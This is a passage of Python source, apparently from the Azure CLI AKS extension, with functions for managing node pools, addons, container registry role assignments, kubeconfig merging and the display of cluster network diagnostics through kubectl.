    """Ensure (or, when detach=True, remove) the 'acrpull' role assignment
    that lets the cluster's identity pull from the given container registry.

    acr_name_or_id may be either a full ARM resource ID or a bare registry
    name; in the latter case the registry is looked up across all resource
    groups of the current subscription.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    if is_valid_resource_id(acr_name_or_id):
        # Resolve the registry from its full resource ID.
        try:
            parsed = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed['subscription'])
            registry = acr_client.registries.get(parsed['resource_group'], parsed['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        # Resolve the registry by name across all resource groups.
        registry_resource = 'Microsoft.ContainerRegistry/registries'
        try:
            registry = get_resource_by_name(cli_ctx, acr_name_or_id, registry_resource)
        except CloudError as ex:
            if 'was not found' in ex.message:
                raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(acr_name_or_id))
            raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
def _ensure_aks_acr_role_assignment(cli_ctx,
                                    client_id,
                                    registry_id,
                                    detach=False):
    """Create — or delete, when detach=True — the 'acrpull' role assignment
    for client_id scoped to the given registry. Raises CLIError on failure.
    """
    if detach:
        removed = _delete_role_assignments(cli_ctx,
                                           'acrpull',
                                           client_id,
                                           scope=registry_id)
        if not removed:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return
    created = _add_role_assignment(cli_ctx,
                                   'acrpull',
                                   client_id,
                                   scope=registry_id)
    if not created:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
def aks_agentpool_show(cmd,  # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name,
                       nodepool_name):
    """Fetch a single agent pool of the given managed cluster."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd,  # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name):
    """List every agent pool of the given managed cluster."""
    pools = client.list(resource_group_name, cluster_name)
    return pools
def aks_agentpool_add(cmd,  # pylint: disable=unused-argument,too-many-locals
                      client,
                      resource_group_name,
                      cluster_name,
                      nodepool_name,
                      tags=None,
                      kubernetes_version=None,
                      node_zones=None,
                      enable_node_public_ip=False,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      pod_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type="Linux",
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      labels=None,
                      max_surge=None,
                      mode="User",
                      aks_custom_headers=None,
                      kubelet_config=None,
                      linux_os_config=None,
                      no_wait=False):
    """Add a new agent pool (node pool) to an existing managed cluster.

    Builds an AgentPool model from the CLI arguments, validates the name is
    not already taken and that autoscaler flags are consistent, then issues
    the create_or_update call (optionally without waiting).

    Raises CLIError when a pool with the same name already exists or when
    the autoscaler arguments are invalid.
    """
    # Reject duplicate pool names up front (exact, case-sensitive match).
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []
    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            except ValueError:
                # NOTE(review): str.strip() and list.append() do not raise
                # ValueError, so this validation branch looks unreachable —
                # malformed taints are passed through to the service. Confirm
                # whether format validation was intended here.
                raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
    # Pick a per-OS default VM size when the caller did not specify one.
    if node_vm_size is None:
        if os_type == "Windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"
    if max_surge:
        upgradeSettings.max_surge = max_surge
    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
        vnet_subnet_id=vnet_subnet_id,
        pod_subnet_id=pod_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=node_zones,
        enable_node_public_ip=enable_node_public_ip,
        node_taints=taints_array,
        scale_set_priority=priority,
        upgrade_settings=upgradeSettings,
        mode=mode
    )
    # Spot pools additionally carry an eviction policy and a max price;
    # -1 (substituted for NaN) means "pay up to the on-demand price".
    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        if isnan(spot_max_price):
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price
    # Validates and, when enabled, applies min/max autoscaler counts.
    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)
    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type
    if kubelet_config:
        agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
    if linux_os_config:
        agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd,  # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Manually scale an agent pool to the requested node count.

    Raises CLIError when the pool has the cluster autoscaler enabled
    (manual scaling would conflict) or when the requested count equals
    the current count (nothing to do).
    """
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    target_count = int(node_count)
    if instance.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if target_count == instance.count:
        raise CLIError("The new node count is the same as the current node count.")
    instance.count = target_count  # pylint: disable=no-member
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd,  # pylint: disable=unused-argument
                          client,
                          resource_group_name,
                          cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          no_wait=False,
                          node_image_only=False,
                          max_surge=None):
    """Upgrade an agent pool's Kubernetes version, or only its node image.

    --node-image-only and a Kubernetes version are mutually exclusive:
    a version upgrade already implies a node-image upgrade.
    """
    if node_image_only:
        if kubernetes_version != '':
            raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
                           'If you only want to upgrade the node version please use the "--node-image-only" option only.')
        return _upgrade_single_nodepool_image_version(no_wait,
                                                      client,
                                                      resource_group_name,
                                                      cluster_name,
                                                      nodepool_name)
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.orchestrator_version = kubernetes_version
    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        instance.upgrade_settings.max_surge = max_surge
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd,  # pylint: disable=unused-argument
                                      client,
                                      resource_group_name,
                                      cluster_name,
                                      nodepool_name):
    """Return the upgrade profile (available upgrade versions) of an agent pool."""
    profile = client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
    return profile
def aks_agentpool_update(cmd,  # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         tags=None,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         min_count=None, max_count=None,
                         max_surge=None,
                         mode=None,
                         no_wait=False):
    """Update an agent pool's autoscaler settings, tags, mode, or max surge.

    Exactly one of the three autoscaler flags is expected when no other
    property (tags/mode/max-surge) is being updated. Returns None without
    calling the service when the request is a no-op (enabling an already
    enabled autoscaler, or disabling an already disabled one).
    """
    # Booleans sum to the number of autoscaler flags the caller supplied.
    update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
    # NOTE(review): when two or more autoscaler flags are combined with
    # --tags/--mode/--max-surge this guard does not fire, so conflicting
    # flags are not rejected here — confirm whether that is intended.
    if (update_autoscaler != 1 and not tags and not mode and not max_surge):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode" or "--max-surge"')
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    # Enabling or updating the autoscaler requires both bounds.
    if min_count is None or max_count is None:
        if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler set.')
    if min_count is not None and max_count is not None:
        if int(min_count) > int(max_count):
            raise CLIError('value of min-count should be less than or equal to value of max-count.')
    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            # Already enabled: warn and bail out without touching the service.
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        instance.upgrade_settings.max_surge = max_surge
    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            logger.warning('Autoscaler is already disabled for this node pool.')
            return None
        # Disabling clears the bounds as well.
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None
    # Tags are replaced wholesale (a None argument clears them).
    instance.tags = tags
    if mode is not None:
        instance.mode = mode
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd,  # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete an agent pool from a managed cluster.

    Performs a case-insensitive existence check first so the user gets a
    clear CLIError (with the typo "doesnt" fixed to "doesn't") instead of
    an opaque service-side failure when the pool name is wrong.
    """
    instances = client.list(resource_group_name, cluster_name)
    # Case-insensitive existence check before issuing the delete.
    agentpool_exists = any(
        agentpool_profile.name.lower() == nodepool_name.lower()
        for agentpool_profile in instances
    )
    if not agentpool_exists:
        raise CLIError("Node pool {} doesn't exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))
    return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable the given comma-separated addons on a managed cluster."""
    subscription_id = get_subscription_id(cmd.cli_ctx)
    current = client.get(resource_group_name, name)
    updated = _update_addons(
        cmd,
        current,
        subscription_id,
        resource_group_name,
        name,
        addons,
        enable=False,
        no_wait=no_wait
    )
    # send the managed cluster representation to update the addon profiles
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, updated)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
                      subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
                      appgw_watch_namespace=None, disable_sgxquotehelper=False, no_wait=False):
    """Enable one or more addons on a managed cluster.

    Updates the addon profiles via _update_addons and pushes the cluster
    back to the service. When the monitoring or ingress-appgw addon ends up
    enabled, the update is performed synchronously (ignoring no_wait)
    because the result is needed for post-creation role assignments.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
                              appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
                              disable_sgxquotehelper=disable_sgxquotehelper, no_wait=no_wait)
    # Ensure the ContainerInsights solution exists in the target workspace
    # before the cluster update is submitted.
    if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
        _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
    monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
        cloud_name = cmd.cli_ctx.cloud.name
        # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
        if monitoring and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(result, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(result, cmd)
    else:
        result = sdk_no_wait(no_wait, client.create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):   # pylint: disable=unused-argument
    """Rotate the certificates of a managed cluster (no-wait by default)."""
    return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd,  # pylint: disable=too-many-branches,too-many-statements
                   instance,
                   subscription_id,
                   resource_group_name,
                   name,
                   addons,
                   enable,
                   workspace_resource_id=None,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_prefix=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   disable_sgxquotehelper=False,
                   no_wait=False):  # pylint: disable=unused-argument
    """Enable or disable the given addons on a managed-cluster model.

    Mutates and returns `instance`: updates instance.addon_profiles for each
    addon named in the comma-separated `addons` string and nulls out the
    service principal and AAD profiles (otherwise server-side validation
    complains). Raises CLIError for unknown addon names, for enabling an
    already-enabled addon, or for disabling an addon that is not installed.
    """
    # parse the comma-separated addons argument
    addon_args = addons.split(',')
    addon_profiles = instance.addon_profiles or {}
    os_type = 'Linux'
    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type
        # honor addon names defined in Azure CLI
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)
        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                # Fall back to (or create) the subscription's default
                # workspace when none was supplied, then normalize the ID.
                if not workspace_resource_id:
                    workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                workspace_resource_id = workspace_resource_id.strip()
                if not workspace_resource_id.startswith('/'):
                    workspace_resource_id = '/' + workspace_resource_id
                if workspace_resource_id.endswith('/'):
                    workspace_resource_id = workspace_resource_id.rstrip('/')
                addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError('The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                # Fresh profile: config is rebuilt from the supplied appgw_* args.
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_prefix is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
                if appgw_subnet_cidr is not None:
                    # --appgw-subnet-cidr overwrites --appgw-subnet-prefix (same config key).
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
                                   'To change open-service-mesh configuration, run '
                                   f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
                                   'To change confcom configuration, run '
                                   f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                # SGX quote helper defaults on; --disable-sgxquotehelper turns it off.
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "true"})
                if disable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "false"
            addon_profiles[addon] = addon_profile
        else:
            # Disabling: the kube-dashboard addon gets a stub profile even if
            # absent; any other missing addon is an error.
            if addon not in addon_profiles:
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
                else:
                    raise CLIError("The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable
    instance.addon_profiles = addon_profiles
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    return instance
def aks_get_versions(cmd, client, location):  # pylint: disable=unused-argument
    """List the Kubernetes orchestrator versions available for managed clusters in a region."""
    return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".
    """
    if path == "-":
        # Special case: dump to stdout instead of touching the filesystem.
        print(kubeconfig)
        return
    # Ensure the parent directory and at least an empty config file exist.
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # Tolerate a concurrent creation of the same directory.
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # Create the file with owner-only permissions (0600).
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # Write the new kubeconfig to a temp file, then merge it into the existing one.
    fd, temp_path = tempfile.mkstemp()
    scratch = os.fdopen(fd, 'w+t')
    try:
        scratch.write(kubeconfig)
        scratch.flush()
        merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        # Best-effort: report but do not fail the whole command on a merge error.
        logger.warning('Failed to merge credentials to kube config file: %s', ex)
    finally:
        scratch.close()
        os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
    """Merge the named-entry list addition[key] into existing[key] in place.

    Entries are matched by their 'name'. On a collision the existing entry
    is removed when `replace` is true or the two entries are identical;
    otherwise the user is prompted to overwrite (a CLIError is raised when
    no TTY is available or the user declines).

    Fix: iterate over a snapshot of existing[key] — the original code
    removed items from the list it was iterating, which makes Python skip
    the element following each removal.
    """
    if not addition[key]:
        return
    if existing[key] is None:
        existing[key] = addition[key]
        return
    for i in addition[key]:
        # Snapshot via list(...) so remove() below cannot disturb iteration.
        for j in list(existing[key]):
            if i['name'] == j['name']:
                if replace or i == j:
                    existing[key].remove(j)
                else:
                    from knack.prompting import prompt_y_n
                    msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
                    overwrite = False
                    try:
                        overwrite = prompt_y_n(msg.format(i['name']))
                    except NoTTYException:
                        pass
                    if overwrite:
                        existing[key].remove(j)
                    else:
                        msg = 'A different object named {} already exists in {} in your kubeconfig file.'
                        raise CLIError(msg.format(i['name'], key))
        existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Load and parse a kubeconfig YAML file, returning its contents.

    Raises CLIError with a friendly message when the file does not exist or
    cannot be parsed. Other OS errors (e.g. permission denied) are
    re-raised: previously they were silently swallowed, making the function
    return None and fail later with a confusing downstream error.
    """
    try:
        with open(filename) as stream:
            return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        if getattr(ex, 'errno', 0) == errno.ENOENT:
            raise CLIError('{} does not exist'.format(filename))
        raise
    except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
        raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig in addition_file into existing_file.

    Optionally renames the added context/cluster to context_name, renames
    admin contexts so they do not clobber user contexts, warns when the
    target file is not chmod 600 on POSIX, writes the merged YAML back to
    existing_file, and prints the resulting current context.

    Fix: the None-check for the loaded addition now happens *before* the
    addition is dereferenced; previously a failed load combined with
    context_name raised a bare TypeError instead of a CLIError.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # Validate the addition loaded before touching its contents.
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']
    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)
    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)
    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
    print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
    """Create a CloudStorageAccount client from credential kwargs.

    Pops the credential entries out of `kwargs` so they are not passed
    downstream a second time; an unused 'connection_string' is discarded.
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
    account_name, account_key, sas_token = (
        kwargs.pop(arg, None) for arg in ('account_name', 'account_key', 'sas_token'))
    kwargs.pop('connection_string', None)
    return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
    """Return the storage account ID from the first diagnostic setting of an
    AKS cluster, or None (with a console message) when none is configured.
    """
    from azure.mgmt.monitor import MonitorManagementClient
    diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
    subscription_id = get_subscription_id(cli_ctx)
    aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
                      '/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
    diag_settings = diag_settings_client.list(aks_resource_id)
    if not diag_settings.value:
        print("No diag settings specified")
        return None
    # Only the first configured setting's storage account is consulted.
    return diag_settings.value[0].storage_account_id
def display_diagnostics_report(temp_kubeconfig_path):   # pylint: disable=too-many-statements
    """Poll aks-periscope diagnostic results via kubectl and print a report.

    Uses the given kubeconfig to enumerate Ready nodes, then polls the
    'apd' custom resources in the aks-periscope namespace (up to 10
    retries) until each Ready node has network config and network outbound
    data, finally printing both as tables. Raises CLIError when kubectl is
    not on PATH or a kubectl invocation fails.
    """
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    nodes = subprocess.check_output(
        ["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
        universal_newlines=True)
    logger.debug(nodes)
    node_lines = nodes.splitlines()
    # Map of ready node name -> "its diagnostics have been collected".
    ready_nodes = {}
    for node_line in node_lines:
        columns = node_line.split()
        logger.debug(node_line)
        if columns[1] != "Ready":
            logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
        else:
            ready_nodes[columns[0]] = False
    logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
    if not ready_nodes:
        logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
    network_config_array = []
    network_status_array = []
    apds_created = False
    max_retry = 10
    for retry in range(0, max_retry):
        if not apds_created:
            # Phase 1: wait until one apd resource exists per ready node.
            apd = subprocess.check_output(
                ["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
                universal_newlines=True
            )
            apd_lines = apd.splitlines()
            if apd_lines and 'No resources found' in apd_lines[0]:
                apd_lines.pop(0)
            print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
                                                                            len(ready_nodes),
                                                                            '.' * retry), end='')
            if len(apd_lines) < len(ready_nodes):
                time.sleep(3)
            else:
                apds_created = True
                print()
        else:
            # Phase 2: pull the per-node network config / outbound status
            # from each node's apd resource until all are collected.
            for node_name in ready_nodes:
                if ready_nodes[node_name]:
                    # Already collected for this node.
                    continue
                apdName = "aks-periscope-diagnostic-" + node_name
                try:
                    network_config = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
                        universal_newlines=True)
                    logger.debug('Dns status for node %s is %s', node_name, network_config)
                    network_status = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
                        universal_newlines=True)
                    logger.debug('Network status for node %s is %s', node_name, network_status)
                    if not network_config or not network_status:
                        print("The diagnostics information for node {} is not ready yet. "
                              "Will try again in 10 seconds.".format(node_name))
                        time.sleep(10)
                        break
                    network_config_array += json.loads('[' + network_config + ']')
                    network_status_object = json.loads(network_status)
                    network_status_array += format_diag_status(network_status_object)
                    ready_nodes[node_name] = True
                except subprocess.CalledProcessError as err:
                    raise CLIError(err.output)
    print()
    if network_config_array:
        print("Below are the network configuration for each node: ")
        print()
        print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
        print()
    else:
        logger.warning("Could not get network config. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")
    if network_status_array:
        print("Below are the network connectivity results for each node:")
        print()
        print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
    else:
        logger.warning("Could not get networking status. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
    """Colorize each diagnostic's "Status" field in place.

    Entries whose status contains "Error:" are wrapped in red, all other
    non-empty statuses in green. The (mutated) list is returned.
    """
    reset = colorama.Style.RESET_ALL
    for entry in diag_status:
        status = entry["Status"]
        if not status:
            continue
        color = colorama.Fore.RED if "Error:" in status else colorama.Fore.GREEN
        entry["Status"] = f'{color}{status}{reset}'
    return diag_status
def format_bright(msg):
